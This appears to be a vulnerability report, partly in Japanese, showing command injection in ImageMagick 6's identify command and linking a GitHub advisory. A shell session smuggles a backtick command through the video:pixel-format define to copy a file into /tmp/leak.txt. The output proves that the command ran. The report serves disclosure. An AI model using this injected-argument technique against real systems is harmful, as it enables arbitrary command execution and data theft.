6系のバージョンで確認する場合のメモ
convert -version
Version: ImageMagick 6.9.11-60 Q16 x86_64 2021-01-25 https://imagemagick.org
7以降はmagick を使用、6系はconvert,identifyなどのコマンドを使う。(すでにある7.0のイシューと違うのはそこだけ)。
ImageMagick 7.0 use command magick insted of 6.0 convert,identify,etc.
Linux
Given a normal video file, namely test.mov, the following demonstrates how command injection happens.
/home/test/exp
➜ echo 'deadbeef' > test.txt
/home/test/exp
➜ identify -define video:pixel-format="rgba `cat test.txt > /tmp/leak.txt`" test.mov >info.log
/home/test/exp
➜ tail info.log
test.mov[20] MOV 788x488 788x488+0+0 8-bit TrueColor sRGB 0.030u 0:00.028
test.mov[21] MOV 788x488 788x488+0+0 8-bit TrueColor sRGB 0.030u 0:00.026
test.mov[22] MOV 788x488 788x488+0+0 8-bit TrueColor sRGB 0.030u 0:00.024
test.mov[23] MOV 788x488 788x488+0+0 8-bit TrueColor sRGB 0.020u 0:00.022
test.mov[24] MOV 788x488 788x488+0+0 8-bit TrueColor sRGB 0.020u 0:00.021
test.mov[25] MOV 788x488 788x488+0+0 8-bit TrueColor sRGB 0.020u 0:00.018
test.mov[26] MOV 788x488 788x488+0+0 8-bit TrueColor sRGB 0.020u 0:00.017
test.mov[27] MOV 788x488 788x488+0+0 8-bit TrueColor sRGB 0.020u 0:00.014
test.mov[28] MOV 788x488 788x488+0+0 8-bit TrueColor sRGB 0.020u 0:00.013
test.mov[29] MOV 788x488 788x488+0+0 8-bit TrueColor sRGB 33.0075MiB 0.020u 0:00.011
/home/test/exp
➜ cat /tmp/leak.txt
deadbeef
https://github.com/advisories/GHSA-7c5r-cghm-f2jx